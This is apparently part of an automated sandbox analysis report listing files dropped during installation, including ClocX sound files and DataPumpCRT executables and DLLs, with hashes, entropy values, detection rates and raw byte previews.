Preview:	.PNG........IHDR...<..........L......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b.s..#.3....3.z..AT\.AOO.!00....3....!............,-+.........1/.................?@E...............qqq.......YQQ.....BA!...B..V.6..b.........=....+.6}....@DM....:....48<.....BDK.....>?D.KLQ.STY.:;=.vwy......1/......eii.....""........e...y.......:.9.......FFF....c..Tg...=....;>F.hfb{....11/.........kmm....%".c....+.....11............=...._^b}........jjk....j....................888...................y...........................-...............................W\|~}....b`^.........???'zzz.....1221...N........}}}.,,,...........y....................... ...............{...'................tsy.EEC..&.......=....................HHD................................?}.d..z....?\|`.6}._[;'....0...MIYAm..7......)].n..Z.:..oa`bffPVRbpttfpssc......W..+V2<z.....[ggg.WWW.........@...ED...V.........sf.v.\|..:......o...YUFZ..............=y....{.....7.0..8.\.pA.......9.Y..&.w...........

C:\Program Files (x86)\ClocX\Sounds\alert.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	RIFF (little-endian) data, WAVE audio, MPEG Layer 3, mono 8000 Hz
Category:	dropped
Size (bytes):	10858
Entropy (8bit):	7.814865066990573
Encrypted:	false
SSDEEP:	192:0OQIOBHC22Ddnc+uCpmoHrXAUyZyYLTPr6L3zCY+dEE2apqgTMUiirzT3wa:0VJU2Sdn6CcyAKY/e7zCYmEE2e/iif7r
MD5:	74053F5E4BF6420F04AE67A74BD025EB
SHA1:	EADBDFA25C6F7C14D7EE06D557AB8449B9551334
SHA-256:	45950471E4FAF639815B99C48BD87C140610DCB587C0A9AF1F941D63A7500D78
SHA-512:	B5754571FFCF47240084272D0DF068AC1830D870A940379DB993214682D04777845C8DFC637B6119161D9600E8574EB77F5749472C69F07A815FA47CF20F600D
Malicious:	false
Reputation:	unknown
Preview:	RIFFb..WAVEfmt ....U...@.......................q.data0....(...B..YF..`....<..D....,..@...@.i...B,.lb.A....I..&..!(U.D....W}.......@.8.......b...!Wx.0Bw8..A.8....Bw4........"".8.C.)....Q@.@......._...(..#....P ...-.mf.......`...\|..S..0.D..`/.'....)....I.=..4..X...j.cq.1..=....%......C.'...N....\|.$W8.tY.......'2\.3`..l.a...$..z?.........(..!....P..G................}....3.a..T...~.~@a.6T.1...Sw...I.Nz..s.....z..d.......s.....0.c.p..5......:.4..3..(B.d..V.=.dZY..8q.M...ja...(....................b`.LM.9P\|4@..07.....a....R....E...A,......%.SJJtdd,X.,...6+&..U.#.../..{[......._..z.R.j`,.....(.s..............J..(...B...X.....Yh.-.'...Mi#s$...#.....'..=Z.hp;.dB#.s.3K......RX..iT.......9.E.T:z%u."FT,....2.5O.w+s)..xt.....m..s+.&.Q...,T.++....H...(.!.:..@.!.".P..a.rAc..........,..1h.S3...i.....?Q..o..M..eidNF.y.w. q..\|....4n,bq_.R_.q...`..;.=.).....`..z..w....M.E....&9....;..2...(./....$S.T..`.L....R....{#4.o...C;.....:....%.D~......C.........?.R..m

C:\Program Files (x86)\ClocX\Sounds\beep-ClockChime.wav

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 7418 Hz
Category:	dropped
Size (bytes):	4022
Entropy (8bit):	5.677177270084845
Encrypted:	false
SSDEEP:	96:mzWFPsX5MewbZxnvkQRti2glLf0KpyhF7YdBF2eKAtFjP:ma+MewzkKglLf0Kpzy47
MD5:	FEDC74E595F352049284195DE8E75F09
SHA1:	8CF9D3E2D8152D843122358E10F43A66935EA5AD
SHA-256:	1F4A7272783E4A28B0BB7A73CF832F75D0D1358A99555A1F84C9CECD52D2A227
SHA-512:	0E78BC04BC8C56AA886F0E02BE30B34B4B6EC2415801CF1DF0EB5A2A4465D71120AB71C88B778A429B4CFD55E2F06279DAD8B513B5F41E6061F9F8055F717C59
Malicious:	false
Reputation:	unknown
Preview:	RIFF....WAVEfmt ....................data....G.j.hqG..Yn;..[e=t..FM...V....m&.....q.../gy\|.MYwy.pXvg.bvL..s.>..p.)e.\|.IX...V7.\|..D.q..Cya..Vw\..htYd.v.dO...z7....2....Ag...Ya}t.w[wb..bvJ..s.F....;e...MP...e>....C.y..Fng..Xg^..yp^h..w_M...q:....8\|...D\...aS...yRnn..YkX..hnO..}yGm...XY...eC....Dv...Mjy.._\d..ye_p..nbY...mJ....Iv...L[...dO\|..}Pm...^dh..ne\...mRp...[^...gP...\|Jn...V^...kVm..._bz..k_j...eY...nSn...X[...jSz...Uh...bYz..wYh...a^v..p\e...eYz..tYg...dY...vSt...Va...hXw..\|Yh...dbk..te^...qYt...^_...gO...}Lq...Xe...g[m..\|bgt..mha..zpR...\|Ps...U[...hR....Mv\|..Xkk..jnd..ys^j..\|dU...qI....Fv...Rh...b\\|..._vm..aq[..nvM..y.Rq...YV...qO....I.\|..Oqm..^pj..pnde..ynR..}zF....Fz...Rj..._X.w.}X.h..Yz^..h}R..q.Yp.}.aU...yL....C.}..Jvt..^ttz.nkmb..vwR..w.I....Fw...Ug.\|.dU.v..U.h..U.b..b.Y..p.am.y.eR...yG....D....Jsy..^p\|w.qkyd..p}U..p.M..w.Jt.\|.\g.}.hS.w..U.m..V.j..a\|a\|.m}eh.w.jU...\|M....J....Rs...em.w.tgyg..jzY..m.U..w.Ut.}.dh...mV.\|..X.v..[}p..bvgy.q\|mk.}\|n[....U....S....[p...kj.y.vawm..j

C:\Program Files (x86)\ClocX\Sounds\clockbell.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 32 kbps, 11.025 kHz, Monaural
Category:	dropped
Size (bytes):	12746
Entropy (8bit):	7.867655419483201
Encrypted:	false
SSDEEP:	192:iUmkPm5hJwn66NNF7I/b+aMcErEsgneaOaGZHReTKNlEvLkzu6462qvpS34Ocgt+:iHGmfCxqi/cErInATx5mLYu6AOOcfr
MD5:	F29BE0977BEF501F9CC2EB3473A7EC03
SHA1:	FA32D1AE499B0726E98266EEF416F288C5E43C8D
SHA-256:	11F4A5755D5ABFC2E6470C1DF2CB67983CCCAD1F5AF8C16E8A0B47321A862FCD
SHA-512:	8AB63C7FC1151F12625624092948F763BA22215D9DC0263D372FDEEFC70E14D1A9992D10D655D7778DCA936BE50842780FE7807D30605FEA295CC30FD58767EB
Malicious:	false
Reputation:	unknown
Preview:	..@..........Info.......<..1.............""&&..337;;@@DHHLLQUUYY]bbffjnnssw{{......................................................:LAME3.96 .7.....4... $..".. ..1..3P4.........................................@..+..D.X...F),r.n_0...x..Y..:...19..t..A..k.`.S.. ....n.@8..CH...G.....S....Ha.5......qL.QM"..b8..eq.N.....bY.{\|.y.?...q,.....B..d.}..!..g3.$bY.%.wT..f4.......r.. ............} .......@ ......i...B..0r.._......p....\V..G...g]. Xv.....'.eQ..h....8.......(.L..]........\|...(.Mc7.D...#...-.<Pv}.us6..H. 6.9.y.k..n.w.........k......5...p.~S.......v_...............$......?.=_I/...%...Y..w&.$.N....K......B..1s.....HH..E...&.@........."...tdI.+P.~...F..(Y..z.,R.aA0..s...32>u. L..r..>.H..d.1"..$..]....`.....{<.5..&%.......ti..S-Tl.Ff..AN.i...M...$.PZ).4'L.7:t.jO3e..d......(...N....;......Z......9...B..0.r.......Q..aFP.I.fU!@y.*.nH&z...@Z.....L.......N..w.[4..&+...-.6P../...nj.....Jb.T.a..;........D.%..~...>f.+ p..~..?K..?.vI....QOu.K...ZS1.\|}@....,...jY

C:\Program Files (x86)\ClocX\Sounds\ring.wav

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
Category:	dropped
Size (bytes):	10026
Entropy (8bit):	6.186386196222228
Encrypted:	false
SSDEEP:	192:AHTBu49v6XhLYxXnIt6cFg9RdpVBFx3HYIQ04PpQlAZfu17QfW/Dtsy:0T19yRLYdnIt9+hpVBX3M00QlOGQfGDt
MD5:	5549AF0CBB0CC2F1AB1A1DD52AC3531E
SHA1:	22E51923C9365EDB643B68AFBC8C44D0DA25112A
SHA-256:	F32A30899D104EF03CDBDA1D433015982CE34EA1D58481C1E437D56C92D2F5C6
SHA-512:	870F6A04AF68BD68A8922972399FF5609D06CDD92B3D785E05B71BA60929B6D0CD380FC5C5365DEE26F69D9C84D85C34A57EA51C8D41D96A06FEFCB044B4AAE3
Malicious:	false
Reputation:	unknown
Preview:	RIFF"'..WAVEfmt .........+...+......data.&..{0e....vS<zz..jtnP....u.u..Vu.x...lGzq...j>v...z.M].o..l....[.bz...zAex....RD.t..}.fs.k.vk.v..Wke....a<ua....X\ok..t._p.s.s..{.{S._....e\e]....X[zy....].~d.fx...uigK....gSji....Ryvf....v.x}.Q....yZk\....`u\Z...~]~y..Xxsl..xyUsv..z.g>....{.g}.`.._....`sb....s/p}....UW.f..f.vs.k.jy....Cso....`Do[...`Pqt...._.._.uy...gIsL...fG[`....M_.`....u.ya.I....v.k[.x..lduup....Kq.u...ie.[s....o..nXu..~.HRet...[LaZ....uazy..z....elqy...}UdS{....Zbn....tn.pu.~....ZiUi....\UU....sZvf....}..f.ki....i\Sz....VjX{...olk`..u.~..xq[s....\iUl....qjQ.....q}s.}..}..izde....sj=u....e`Z{~..j.{b.zk....xnQp....`ngs...}s.[..o....x.Z`....adSf....byRv....y.o.lf....so`j....nyZk....up[..v.zy.pxns.}..l.Q_....~kM.....y.k....z..n.ki.....xGv.v..kxLl...x.uU.uk...~t.X{.p..v}Vu.....uV......sk.o..g..z.uvq..z..Gz.....of.p..f.xb.z.yt.s..\{.t...q[~`..y.xX~...y.bz.l..g....b{Wy....Wnn....]b.j..v.q.}l.ak.u..gtf....n_.b....n..z..~.o..{.k..z..b.[}...}{b=....nvuu....f.n_.s....g.{i......zf.

C:\Program Files (x86)\ClocX\Sounds\ring2.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 32 kbps, 11.025 kHz, Monaural
Category:	dropped
Size (bytes):	6686
Entropy (8bit):	7.823729077076571
Encrypted:	false
SSDEEP:	192:gFG+4dGvjjICGxrvRRIOHmEaS4VwpZo0TuoMa:gFG5QfIxxrpRIOGBS4Vw4auda
MD5:	FFE63755C41C834CAA3D4967D099108C
SHA1:	B3C86A2FBA4123DC1A107328B810C64A12280936
SHA-256:	F6F4AD8F998096B329677BCE8CC1DB37B6923C5DE6761328DD5C3EF6A49CE892
SHA-512:	A60C988C41B0642D9BEC0D6E3230C1B18A26E0558D7E0864902B48C09E447114E1CB5ECF7625B9512D0094E300676B5AD73BC10ACDFFD32DBBE425FCD584AF25
Malicious:	false
Reputation:	unknown
Preview:	..@..........Info......................!!!))))111999BBBJJJJRRRZZZccckkkssss{{{......................................................:LAME3.96 .7......... $..".. .....N..........................................@...Y..`..0.C^.....R.....z.sJ#.Z}s...N!{...x.+.<..D..n..n.\........<.v3....J.AAAAC...C%..w...\..^...w.^..X8P.qqs..\....\..r........<.....[........./i.A.S.../{.....!.7..t3 <4].pD..-k.Zg..\.....X.8..B..0.Y..x....$30t.....7.N0.V.2iC1xf......&.S..6e<....j:Mr^S....r..;m..$+D. ...a..K<.c.m..$.R...RPN...(..$..R;@......i...SP.u.e[.I.+.&..-......NO7.......Dd....(....$-.-.l-...[..yL?.}.........-..>Z.?e..B..1$]..OH.i.+$5i....2....J.....S@...$.nS.09%.. ..j.Q.s.%.m.a&.....&..Ia.r..)..=np......g..=.7.....n....G.A.L.]zp..1Zb%.#.@...[M....P..l..r..w.f8...U.@M..5.E.h.I.&J.B.....M....P..>.._.g...".fm.3..B../.v...`...6....9.3.I..4.....1..s...].e......*..dtrh..UF..Y.^]..]..n.:...z5.h..y{..[2<...t.B.\|....r.f....].2.1...\."v.9.A.{.(.04...E....\|...I.......)2.

C:\Program Files (x86)\ClocX\Sounds\siren.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 24 kbps, 8 kHz, Monaural
Category:	dropped
Size (bytes):	8208
Entropy (8bit):	7.8522466183279285
Encrypted:	false
SSDEEP:	192:5bcKdv2kGc5TguhA4i+Xguk4bAhwZbA7HThwkK0N5KIzA9j04cn:5B2Y5Tguh/guAwZbAr191IJcn
MD5:	59966D556E3973DAB3FA5B70683C3729
SHA1:	9E6A68D02C46F86C17B310A87FD9B6C1C3FC1B12
SHA-256:	CE8B62E4D4F14D50861EB57F67107556984F06C85F6EB3A6208DD2E42B027452
SHA-512:	27280A5FB62D3D8E0B6FDEBAD8941E783F13D850B848FF485A2B65A41CE7607384039CE8970B7D0F55EF268416CCDAEEF0332E9275E90167F29376EB51131D01
Malicious:	false
Reputation:	unknown
Preview:	..8..........Info.......%.. ............""")))00777>>>EEELLSSSYYY``gggnnnuu\|\|\|......................................................:LAME3.96 .(.....8....$.."..... ......................................................8..-s.!F`.A...d.L.......y0.:&.F.M6....#?..F..gkk..R........9....4..X.5..f~..b.l.g^.Jj.u..7..)I.....4....Q}.......,.s......9.^..Z..";.......`.gN6....,.u.)I.&fff.33I..w....?.....=.`0.......`0......rX..8..1..._...b....T...kV._..2.{.$h.q".U5.AM2...P.......@....-V...[6Y8..........D. .,.~.o...-...X..$.>.X*..../.9.Y......+.@k.. .\|..1...Uo......6...{0.$...".@X.z....\D._B.'qJ."...o.._g.....J......^.kp`.Q.l.Z....<$..8..3.R.E.x..-..h..zMXNU._o..c...t..b..x,..:uB\^..W."6mzoX..%!...:.z.6~.X.1h..~.E....6k...r.4.Z...$....um..#=.+#..W..G.u.....k...:...3^....y;...\..N..Y...j.5......?..HW.~.4.o....k.e.Mo~.jX..Rp..L.dYG....p.%..8..1tJ.....S2...8..;.A..8..........R..+.$@..A.....$.6..>.....I......h....<d\|]?.d(.Kti.5...V....P:...F.A:........t..t.X

C:\Program Files (x86)\ClocX\Sounds\trumpet.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 24 kbps, 8 kHz, Monaural
Category:	dropped
Size (bytes):	18360
Entropy (8bit):	7.907116897949521
Encrypted:	false
SSDEEP:	384:O4aEJEp87W0A3vAADh+9gZCh4UzWEuZ8l9E9Zsjjh3m5:O4Hh7WL37z6zWEueb3Q
MD5:	A8543F9F3BCA2D1D1E610A2255644CA9
SHA1:	A94B4154825BB1EEE6704FAD78AFC4ECE10BBCCE
SHA-256:	04B44BD2F0D96D81475F9E5D18C20AA70B37C77F1F60570FF448DA25A9C78754
SHA-512:	AC700D10B8102898961BCB574A84FA88238C749F8941E16A0B58C9E3AC6E39488DA1D515B1393A4232470AE9ECF14AD43AB74BC91606EC3013211C577276B09E
Malicious:	false
Reputation:	unknown
Preview:	..8..........Info.......T..G.............!!$'-00369<@@CFILORRUX[^aadgjmppsvy\|......................................................:LAME3.96 .(.....Z....$..".....G......................................................8..,..d!F@...2... @..#..."#.. @..3.DG{.&...@..Jqqs..D..1%....ww..w...2.P......... ..7......"%\|......{............&.....p...."""......."'%.`.....(e.....""#....4..=.....7.....1........`@h4......pp.........74....8..3.Z._.h.y$]o..(..hb`d9......&.=.F.....R..x..1......2.@U.Y..X......!...7......&....FP....H..o.\|.!s..V....Q2.\|..A.......8... ;......).F.....p.d........L.. @P...c...Y.(..h.)..s...@.w.D9RQ.V..U.U>...".Y<.......8..3........L.....u.....^$.e....... (..K{.....:H.J.$g..Z.$...2.........j[QY.....$L.H.{(.z.JY.P.1wY..... ;..(.1.. d 0..j`....dU..%U".<.%.......Q<....d..D.q!..`>7S......tT...I)#g../..F.Dd).U,......ac..o.Oa.-U.....8..2.^.5.x....nf..K......<.e..}.d/..1`.1).[..{g{.I..!VUVk.u.R&.c..=7.........'......g:.q....\|.{j.h.....-+I...HQ../.J....Q

C:\Program Files (x86)\ClocX\uninst.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	53876
Entropy (8bit):	5.750302372670251
Encrypted:	false
SSDEEP:	768:EGn4o4BL/akfpI1nu0LXGS8BPfeyWMZtuHvwbtOuIYdPc+92TUXr6fJkdn:D4hwgonu0fJytuPwbdNc+9aUXr6fJon
MD5:	3387961372FE91C2CC69B53180CBFEE4
SHA1:	EDE6FB0D2319536EFCA218D461425D2ADDFFD88E
SHA-256:	DAD57975BE6833C50D32EE77212ADDF11A80195D82365ADE6042234E492BD845
SHA-512:	F6551803B90934A5555587BC81B4758B21FC8BAD1653F298846E2195C797932893D761249F9CF527E95809FFC0BFD785872F0B42F56E8ADC64BDB06C63F09C5C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L...a.d.................d...........3............@..........................0............@.................................0............L...........................................................................................................text...jb.......d.................. ..`.rdata..4............h..............@..@.data...8............\|..............@....ndata.......P...........................rsrc....L.......N..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	337408
Entropy (8bit):	6.515131904432587
Encrypted:	false
SSDEEP:	6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
MD5:	62D2156E3CA8387964F7AA13DD1CCD5B
SHA1:	A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
SHA-256:	59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
SHA-512:	006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..\|...\|...\|...p...\|...w...\|.d.r...\|...v...\|...x...\|.i.#...\|...}.\|.\|.d.!...\|...w...\|..V....\|...v...\|.......\|. .z...\|.Rich..\|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\COPYING.LGPLv2.1 (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	26526
Entropy (8bit):	4.600837395607617
Encrypted:	false
SSDEEP:	384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
MD5:	BD7A443320AF8C812E4C18D1B79DF004
SHA1:	37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
SHA-256:	B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
SHA-512:	21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
Malicious:	false
Reputation:	unknown
Preview:	GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	127669
Entropy (8bit):	7.952352167575405
Encrypted:	false
SSDEEP:	3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
MD5:	75C1D7A3BDF1A309C540B998901A35A7
SHA1:	B06FEEAC73D496C435C66B9B7FF7514CBE768D84
SHA-256:	6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
SHA-512:	8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149845
Entropy (8bit):	7.893881970959476
Encrypted:	false
SSDEEP:	3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:	526E02E9EB8953655EB293D8BAC59C8F
SHA1:	7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:	E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:	053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34392
Entropy (8bit):	7.81689943223162
Encrypted:	false
SSDEEP:	768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
MD5:	EA245B00B9D27EF2BD96548A50A9CC2C
SHA1:	8463FDCDD5CED10C519EE0B406408AE55368E094
SHA-256:	4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
SHA-512:	EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	5.956401374574174
Encrypted:	false
SSDEEP:	96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
MD5:	B3CC560AC7A5D1D266CB54E9A5A4767E
SHA1:	E169E924405C2114022674256AFC28FE493FBFDF
SHA-256:	EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
SHA-512:	A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7910
Entropy (8bit):	6.931925007191986
Encrypted:	false
SSDEEP:	192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:	1268DEA570A7511FDC8E70C1149F6743
SHA1:	1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:	F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:	E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
